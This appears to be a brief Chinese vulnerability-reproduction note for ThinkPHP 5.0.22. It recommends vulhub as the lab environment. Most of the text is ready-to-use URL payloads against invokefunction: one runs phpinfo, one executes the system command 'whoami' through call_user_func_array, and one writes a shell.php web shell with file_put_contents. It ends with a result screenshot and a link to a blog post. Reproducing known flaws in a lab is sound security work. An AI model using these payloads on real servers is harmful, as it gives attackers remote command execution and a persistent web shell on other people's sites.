复现环境
thinkphp5.0.22
推荐使用vulhub快速搭建漏洞环境
漏洞payload:
1:/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
2:index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
效果如下
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsIyZuBnLxcDN0QzMwADM5AjMwkTMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
写入文件的payload:
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码
更详细可参考博文:
https://blog.csdn.net/qq_29647709/article/details/84956221